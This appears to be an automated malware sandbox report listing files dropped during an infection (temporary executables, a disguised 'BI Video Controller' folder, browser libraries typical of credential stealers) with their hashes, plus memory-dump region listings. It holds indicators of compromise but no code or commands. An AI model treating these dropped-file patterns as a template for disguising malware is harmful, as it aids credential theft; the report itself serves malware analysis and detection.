06ca61cae058c568860858e49615d04dc4a8820d

SHA256
36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

SHA512
f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d

SHA1
eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

SHA256
dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

SHA512
977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1bf73c53f6bfde488dc08e3d646ffb0e

SHA1
7d514fae8c9d930a2248d8ea0401e75b6bebfee4

SHA256
11120a80ad791590cb2e1b073f9bda3d391328faf84b1b1304afa59283c92957

SHA512
e5e57910bb1cfba780d67e29d94db8f59357ba2095b5be69ae2cdbd52c81e704ab69dcab593d3ddcb08083b8dee621a6734f5a4cfba7b4c9484efa4edb183f1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ddb717126b617023f46894eafb19e9d4

SHA1
871e44c3f8cb8c00c7ca1b3cb38ae2a4609d8204

SHA256
94ec223f3326912a083b27d4c7b35e214b991c3ed8b621be4996b4707844eaae

SHA512
5a70b78126925a90ebf9264dda94047688e8b7472a1d6a8dc616e435b69502de95186749b1100e1c04cad85093cd06834055acbc7454cd61995ab732367e99f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B11.exe
MD5
e987477b0d14b6d7075f0105aa28ba92

SHA1
54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

SHA256
4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

SHA512
bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B11.exe
MD5
e987477b0d14b6d7075f0105aa28ba92

SHA1
54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

SHA256
4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

SHA512
bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

Download Submit
C:\Users\Admin\AppData\Local\Temp\7B11.exe
MD5
e987477b0d14b6d7075f0105aa28ba92

SHA1
54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

SHA256
4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

SHA512
bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

Download Submit
C:\Users\Admin\AppData\Local\Temp\85C1.exe
MD5
49f58a80993170b4351014d0b5068897

SHA1
7af2615ec10821cbefb55c602b270c27fa1d6806

SHA256
905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c

SHA512
2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\85C1.exe
MD5
49f58a80993170b4351014d0b5068897

SHA1
7af2615ec10821cbefb55c602b270c27fa1d6806

SHA256
905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c

SHA512
2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A56.exe
MD5
41c30885a9306086f05f6935fbc51753

SHA1
f8b1e1d1bea0c149ffc871e31c87c4f463122960

SHA256
206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639

SHA512
0d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47

Download Submit
C:\Users\Admin\AppData\Local\Temp\8A56.exe
MD5
41c30885a9306086f05f6935fbc51753

SHA1
f8b1e1d1bea0c149ffc871e31c87c4f463122960

SHA256
206c1ae51b4cb137795296086fdce9238bb4ace5f1c6d3ad61780d5071253639

SHA512
0d8708730bceea15a478d3b3a36cdb93b2ab53cc14c311d9ae19ebb9a39394a97e75ec2814b78702ec1a529198c719937c2e43a9eece94d8c352f18842f2dc47

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D54.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D54.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D54.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\90B1.exe
MD5
30aa314c51df0e3e4e3e923e6660d950

SHA1
7074b9570cf5c3c8421e46c78c36d2dc02c22fbd

SHA256
4c879b95139b260e1a71c5a77107fe81b839564a6dbf6d77b93c83f1f165b852

SHA512
496d53f8f226379158918373fdcb5e714269dbbc97cd8922697210af6f014ddc788e199c01a114de1303f1a81d0ad957d0bc1a989cb33fa571508b666475d1e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\90B1.exe
MD5
30aa314c51df0e3e4e3e923e6660d950

SHA1
7074b9570cf5c3c8421e46c78c36d2dc02c22fbd

SHA256
4c879b95139b260e1a71c5a77107fe81b839564a6dbf6d77b93c83f1f165b852

SHA512
496d53f8f226379158918373fdcb5e714269dbbc97cd8922697210af6f014ddc788e199c01a114de1303f1a81d0ad957d0bc1a989cb33fa571508b666475d1e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\949A.exe
MD5
d3ddcff47d32b16b82d53a1d45ba26bd

SHA1
8d2be1dafd57b82ddf709971b590c762436205bc

SHA256
f83f5f862a96201504c3f06966d12b26e71403477537d41b575b939bba02aa76

SHA512
2e53ffb2c666480605d9a17a8752a0035d25a41cde5f3ba59a4cd394539b85ad3ed39bf0ba7ee075f743d3df6f474b2537e6dccd973fe780461a76b75ffb29ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\949A.exe
MD5
d3ddcff47d32b16b82d53a1d45ba26bd

SHA1
8d2be1dafd57b82ddf709971b590c762436205bc

SHA256
f83f5f862a96201504c3f06966d12b26e71403477537d41b575b939bba02aa76

SHA512
2e53ffb2c666480605d9a17a8752a0035d25a41cde5f3ba59a4cd394539b85ad3ed39bf0ba7ee075f743d3df6f474b2537e6dccd973fe780461a76b75ffb29ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-FP1NT.tmp\7B11.tmp
MD5
6da8ef761a1ac640f74c4509a3da8b47

SHA1
de626da008e5e8500388ec7827bcd1158f703d98

SHA256
232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5

SHA512
c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-O66OP.tmp\7B11.tmp
MD5
6da8ef761a1ac640f74c4509a3da8b47

SHA1
de626da008e5e8500388ec7827bcd1158f703d98

SHA256
232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5

SHA512
c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
MD5
cf8114289d40ec83b53463b1ac8930c9

SHA1
00036a509bc31c4264a0414d3386f420854ca047

SHA256
39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12

SHA512
e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
MD5
cf8114289d40ec83b53463b1ac8930c9

SHA1
00036a509bc31c4264a0414d3386f420854ca047

SHA256
39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12

SHA512
e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
MD5
96f1c8a9c83fbf6411f35d3de8fdc77c

SHA1
41b590133df449c8e0ce247aab7def7cfc39399d

SHA256
ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e

SHA512
fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053353.txt
MD5
df3ffdb654d4b730c622e960c596ceed

SHA1
a2d2340760dc3f9d3f360ed89247ba032599de72

SHA256
b88a2239e3cb54f48d84e2b7b51d63775bece1e8f698713e1d3b10df78d4757a

SHA512
0fb89c9e59c8605de321ee565465c06174eaa2cdfe2ca2185c3a597d7fd3bbf3bc95efac8e1a752023cf759704e91bdcc221a57838e9f9b76519222dbd42b2cb

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053355.txt
MD5
66af8116b81cfc6286d42f6c23d562b2

SHA1
87b32ee3e97cab44b393cb7617f158ae6145f53d

SHA256
7efbe2f2ed172b88d3ac530b535856292bf38f811bdf535d4dcfed0922615b48

SHA512
d84210cc5e99d60687a3687ef4e35091cf46fdb0cddbc3c02b1ab87504585d44e7482ec3b1e5f9c3f464807eae3bad8d2d6148a0215cab9692878b2e0c04aa82

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053357.txt
MD5
e492e7feef114abd075b91acccb64c30

SHA1
b8132214e0351a52922afab409c9c97e6bdaefd5

SHA256
cf190e6c3185a4297bd5fe6d60254c00ba1ce4364b2b961063ea048ddab22dde

SHA512
b91bc02778f89bebb5ee58971aa2b858540772c17e9ae95e4a7857507f3fdeade7007630840b5f2c4d6839aee23388d3b0c56613b331caea221dd344dbdb6386

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053359.txt
MD5
7309c35cfa4ee889252a57aae5cde700

SHA1
ada0157142d89fc9748b00304c4fbbb609ef7c1e

SHA256
70a5494204420cc95fa87002908caad3f85cf7245ecc20c8860ab53d5eff97b1

SHA512
3b5719580344e298a99a06ab6b486aefea8061eba93c66b03b4f4fc5221a62cdc1a334afc5c7d8b4f6a71926e9854885728ffb8cf908dd782ea51f5a17a3dced

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053400.txt
MD5
dc78378d14ed0e7423f5356856b04845

SHA1
1856ffa59abd0c474646eba662a1956178bfbd5e

SHA256
e3fed58f681b52e73ff53057b98500f38cab8019e3fd118d4da122aa51c6ab12

SHA512
1fb4cd0d75c075187a08f2bf8f725906ce7098b391e150be60249616bf6a1f81ead6927ea810682b26ec622250c0903644198f245324177c163393abeb77d48e

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053401.txt
MD5
75721f9ffdb4dda054f4694ce18122b3

SHA1
6e33ac4cf5e430fa74756c5abe58f6d01adf8130

SHA256
129ed54c8f540af48615aa896a25a216fa954dabef030dc34cb31ff262f09e3d

SHA512
645047fdb04df3d6a7b58955af61ad7d0792df6d843e0b8759fe32077e193f247d0148facaf962ce2d9ce59cdf8b775f3b7cfec07ed43abb897bd2ab89b8379d

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053404.txt
MD5
91af397041cc1ff2a42ec29b916b66ca

SHA1
b6b41916ac2644423d3aec64e11e0170f3c04af7

SHA256
be80b679b11eda0c1d79029598889e6875347f4bf20fb766fa3380b42fdb1e36

SHA512
53b0d24c985f9dc0b509039e8cdc0fc89505c40c402cedf9b2c9efd31b246bd116cb45849fde2908527526786bd668986028ebf65bfcf39dfb511011b0d57970

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053405.txt
MD5
2ff95ce64e729db18eaf1bd62ae6004a

SHA1
82f35ca11fdaaf17b73837bb0c3b86c9ad9af056

SHA256
cb5401a0bfc71daf946619f8f4fe2e5e81c68f56546fde77a4cf369866a0dc28

SHA512
68edaca9801b755d7ca43cfad8ff2cd899e217c4c39050ec460e75bbaba5d1ee602a8b0c671d80c0aa700837bb4d247bc37f37d6d83809e5c6264f7751623ead

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053407.txt
MD5
c53f889a639dfe0b07bdff8086ef7d10

SHA1
45a804f3e4d1fcefcc192a7f0967ca93f339ddff

SHA256
7f9b84337c66eb12df070d708533caf60f2a9e80c34900db1a3bc50b402b2b03

SHA512
0043b9d95da3d5d45744213c495cf04171a4541d8ac0c8797fbfadb96fdb5005d857b490541f515d299ec9deb8b814cd6b5f41fe28aaffd030ac586ece37f28f

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053409.txt
MD5
3b516a494a225bf5c551d27ff363f4d3

SHA1
60ff764fafe646e6fb329e0c98423a8ea5c488da

SHA256
ac989aeab8890c816164945f6c6670d0f83cef78948a2c81c572066929a5bf26

SHA512
1bdbcca1d2f8d5988d9ca2daa28a7d10d6c935178ff01e5df1ec48add841787d9153789dc2f0c30e21e0dceead3662efe01bf32437ec5fc10b8284bac3f8e050

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_053412.txt
MD5
dbaec27d0e499e45c2e6f0b5bc6ba0b5

SHA1
691a19d95cfb763c8025e782818d2cf8ff35645d

SHA256
c52143f0ab89b0cb304ee3f97c71ac0e1d4d1062f37178b1337f15b7956f8ccf

SHA512
b865f576a081e7f14bb6c74b2a6b7c2490cd78e21cd37538e8fce4c6ab771350392f587ddbbd94f2fa1b8a46aaa671350c41cd6d0a7f1a30c1e136b646c2208e

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\menu.xml
MD5
0ad63807522a2fc76deff4eddbc77d35

SHA1
85ba4baf1b1a623bc8fe5ea9334088de8da390c7

SHA256
f04362f73243736c636a08982e1f3655ce5824f2e5b0e3e87acbd94d0a906b96

SHA512
5cacea66310d6f8fc41cc742d6570e389e9df0f9faec4af2c8d036635500bfcf605148ec0a6e8d54b64485abb8a3881f00e7c93bbe7ab35eec85f39c6c33dac9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BI Video Controller for x86 systems\BI Video Controller for x86 systems.lnk
MD5
974a0bdde482687f7eb080195a51e2e5

SHA1
f7d53b8685ae27d7d3708327dc19f74b619d818f

SHA256
b8c17c605e4ccdfa61d5ba7a2cfc84ce8fda2318225c3bbd6bb0df875d87bfa3

SHA512
e90bef77131910acc95dfa45b62f167883845adfb85a46690964c54506d25ea42b57f1e003a4f6edb762d1ac47d0791fedf3116c69b69c16f13257a1b1793b34

Download Submit
\??\c:\users\admin\appdata\local\temp\is-o66op.tmp\7b11.tmp
MD5
6da8ef761a1ac640f74c4509a3da8b47

SHA1
de626da008e5e8500388ec7827bcd1158f703d98

SHA256
232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5

SHA512
c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll
MD5
60acd24430204ad2dc7f148b8cfe9bdc

SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9

SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll
MD5
eae9273f8cdcf9321c6c37c244773139

SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0

SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\nss3.dll
MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
MD5
96f1c8a9c83fbf6411f35d3de8fdc77c

SHA1
41b590133df449c8e0ce247aab7def7cfc39399d

SHA256
ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e

SHA512
fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa

Download Submit
memory/184-635-0x0000000000000000-mapping.dmp

Download
memory/600-643-0x0000000000000000-mapping.dmp

Download
memory/812-133-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/812-130-0x0000000000000000-mapping.dmp

Download
memory/812-388-0x0000000004213000-0x0000000004214000-memory.dmp

Filesize
4KB

Download
memory/812-387-0x000000007EBA0000-0x000000007EBA1000-memory.dmp

Filesize
4KB

Download
memory/812-299-0x0000000004212000-0x0000000004213000-memory.dmp

Filesize
4KB

Download
memory/812-298-0x0000000004210000-0x0000000004211000-memory.dmp

Filesize
4KB

Download
memory/812-284-0x0000000000000000-mapping.dmp

Download
memory/824-633-0x0000000000000000-mapping.dmp

Download
memory/832-145-0x0000000000000000-mapping.dmp

Download
memory/916-631-0x0000000000000000-mapping.dmp

Download
memory/1124-623-0x0000000000000000-mapping.dmp

Download
memory/1152-124-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/1152-118-0x0000000000000000-mapping.dmp

Download
memory/1176-649-0x0000000000000000-mapping.dmp

Download
memory/1192-188-0x0000000000400000-0x0000000000946000-memory.dmp

Filesize
5.3MB

Download
memory/1192-183-0x0000000000950000-0x0000000000A9A000-memory.dmp

Filesize
1.3MB

Download
memory/1192-163-0x0000000000000000-mapping.dmp

Download
memory/1380-637-0x0000000000000000-mapping.dmp

Download
memory/1596-203-0x0000000000000000-mapping.dmp

Download
memory/1596-205-0x0000000000BD0000-0x0000000000BD9000-memory.dmp

Filesize
36KB

Download
memory/1596-206-0x0000000000BC0000-0x0000000000BCF000-memory.dmp

Filesize
60KB

Download
memory/1672-222-0x00000000001D0000-0x00000000001D9000-memory.dmp

Filesize
36KB

Download
memory/1672-216-0x0000000000000000-mapping.dmp

Download
memory/1672-221-0x00000000001E0000-0x00000000001E5000-memory.dmp

Filesize
20KB

Download
memory/1992-627-0x0000000000000000-mapping.dmp

Download
memory/2004-170-0x0000000000000000-mapping.dmp

Download
memory/2004-177-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/2004-184-0x0000000004E20000-0x0000000005426000-memory.dmp

Filesize
6.0MB

Download
memory/2028-201-0x0000000007190000-0x0000000007191000-memory.dmp

Filesize
4KB

Download
memory/2028-237-0x0000000009000000-0x0000000009001000-memory.dmp

Filesize
4KB

Download
memory/2028-191-0x0000000000000000-mapping.dmp

Download
memory/2028-208-0x0000000006C32000-0x0000000006C33000-memory.dmp

Filesize
4KB

Download
memory/2028-212-0x00000000078A0000-0x00000000078A1000-memory.dmp

Filesize
4KB

Download
memory/2028-202-0x0000000006C30000-0x0000000006C31000-memory.dmp

Filesize
4KB

Download
memory/2028-199-0x0000000006A90000-0x0000000006A91000-memory.dmp

Filesize
4KB

Download
memory/2028-200-0x0000000007270000-0x0000000007271000-memory.dmp

Filesize
4KB

Download
memory/2028-238-0x0000000008F30000-0x0000000008F31000-memory.dmp

Filesize
4KB

Download
memory/2028-239-0x0000000008F90000-0x0000000008F91000-memory.dmp

Filesize
4KB

Download
memory/2028-215-0x0000000007B60000-0x0000000007B61000-memory.dmp

Filesize
4KB

Download
memory/2028-209-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

Filesize
4KB

Download
memory/2028-245-0x0000000006C33000-0x0000000006C34000-memory.dmp

Filesize
4KB

Download
memory/2028-218-0x0000000007A80000-0x0000000007A81000-memory.dmp

Filesize
4KB

Download
memory/2112-274-0x00000000027D0000-0x00000000027D5000-memory.dmp

Filesize
20KB

Download
memory/2112-132-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2112-126-0x0000000000000000-mapping.dmp

Download
memory/2112-275-0x00000000027C0000-0x00000000027C9000-memory.dmp

Filesize
36KB

Download
memory/2112-272-0x0000000000000000-mapping.dmp

Download
memory/2248-186-0x0000000002980000-0x00000000029F4000-memory.dmp

Filesize
464KB

Download
memory/2248-187-0x0000000002910000-0x000000000297B000-memory.dmp

Filesize
428KB

Download
memory/2248-179-0x0000000000000000-mapping.dmp

Download
memory/2388-115-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2388-116-0x0000000000402E1A-mapping.dmp

Download
memory/2496-541-0x000000000044003F-mapping.dmp

Download
memory/2496-543-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/2516-619-0x0000000000000000-mapping.dmp

Download
memory/2528-270-0x0000000009190000-0x0000000009191000-memory.dmp

Filesize
4KB

Download
memory/2528-283-0x0000000008DF0000-0x0000000008F4B000-memory.dmp

Filesize
1.4MB

Download
memory/2528-247-0x0000000000000000-mapping.dmp

Download
memory/2528-256-0x0000000007440000-0x0000000007441000-memory.dmp

Filesize
4KB

Download
memory/2528-262-0x0000000004110000-0x0000000004111000-memory.dmp

Filesize
4KB

Download
memory/2528-263-0x0000000004112000-0x0000000004113000-memory.dmp

Filesize
4KB

Download
memory/2528-273-0x0000000004113000-0x0000000004114000-memory.dmp

Filesize
4KB

Download
memory/2684-162-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/2684-164-0x0000000004AE0000-0x0000000004FDE000-memory.dmp

Filesize
5.0MB

Download
memory/2684-147-0x0000000000000000-mapping.dmp

Download
memory/2684-158-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/2684-156-0x00000000000C0000-0x00000000000C1000-memory.dmp

Filesize
4KB

Download
memory/2684-159-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

Filesize
4KB

Download
memory/2704-610-0x0000000000000000-mapping.dmp

Download
memory/3056-260-0x0000000000000000-mapping.dmp

Download
memory/3056-264-0x0000000000520000-0x0000000000525000-memory.dmp

Filesize
20KB

Download
memory/3056-266-0x0000000000510000-0x0000000000519000-memory.dmp

Filesize
36KB

Download
memory/3064-117-0x0000000000740000-0x0000000000756000-memory.dmp

Filesize
88KB

Download
memory/3196-645-0x0000000000000000-mapping.dmp

Download
memory/3256-169-0x0000000000000000-mapping.dmp

Download
memory/3256-192-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/3420-538-0x0000000000000000-mapping.dmp

Download
memory/3516-639-0x0000000000000000-mapping.dmp

Download
memory/3528-641-0x0000000000000000-mapping.dmp

Download
memory/3704-234-0x0000000000000000-mapping.dmp

Download
memory/3704-243-0x00000000027A0000-0x00000000027A4000-memory.dmp

Filesize
16KB

Download
memory/3704-244-0x0000000002790000-0x0000000002799000-memory.dmp

Filesize
36KB

Download
memory/3740-617-0x0000000000000000-mapping.dmp

Download
memory/3748-194-0x00000000007D0000-0x00000000007DC000-memory.dmp

Filesize
48KB

Download
memory/3748-190-0x0000000000000000-mapping.dmp

Download
memory/3748-193-0x00000000007E0000-0x00000000007E7000-memory.dmp

Filesize
28KB

Download
memory/3784-125-0x0000000000720000-0x00000000007CE000-memory.dmp

Filesize
696KB

Download
memory/3784-122-0x0000000000000000-mapping.dmp

Download
memory/3848-231-0x0000000000AA0000-0x0000000000AAC000-memory.dmp

Filesize
48KB

Download
memory/3848-230-0x0000000000AB0000-0x0000000000AB6000-memory.dmp

Filesize
24KB

Download
memory/3848-228-0x0000000000000000-mapping.dmp

Download
memory/3916-138-0x0000000000000000-mapping.dmp

Download
memory/3916-174-0x00000000001C0000-0x00000000001FB000-memory.dmp

Filesize
236KB

Download
memory/3916-175-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/3916-625-0x0000000000000000-mapping.dmp

Download
memory/3996-196-0x0000000000000000-mapping.dmp

Download
memory/3996-204-0x0000000002A90000-0x0000000002A97000-memory.dmp

Filesize
28KB

Download
memory/3996-207-0x0000000002A80000-0x0000000002A8B000-memory.dmp

Filesize
44KB

Download
memory/4020-114-0x0000000002CD0000-0x0000000002CDA000-memory.dmp

Filesize
40KB

Download
memory/4036-226-0x0000000007160000-0x0000000007161000-memory.dmp

Filesize
4KB

Download
memory/4036-150-0x0000000005720000-0x0000000005721000-memory.dmp

Filesize
4KB

Download
memory/4036-167-0x0000000005970000-0x0000000005971000-memory.dmp

Filesize
4KB

Download
memory/4036-224-0x0000000006F00000-0x0000000006F01000-memory.dmp

Filesize
4KB

Download
memory/4036-217-0x0000000006BB0000-0x0000000006BB1000-memory.dmp

Filesize
4KB

Download
memory/4036-219-0x00000000072B0000-0x00000000072B1000-memory.dmp

Filesize
4KB

Download
memory/4036-155-0x0000000005780000-0x0000000005781000-memory.dmp

Filesize
4KB

Download
memory/4036-161-0x00000000034A0000-0x00000000034A1000-memory.dmp

Filesize
4KB

Download
memory/4036-144-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

Filesize
4KB

Download
memory/4036-160-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/4036-143-0x0000000077870000-0x00000000779FE000-memory.dmp

Filesize
1.6MB

Download
memory/4036-141-0x0000000000D30000-0x0000000000D31000-memory.dmp

Filesize
4KB

Download
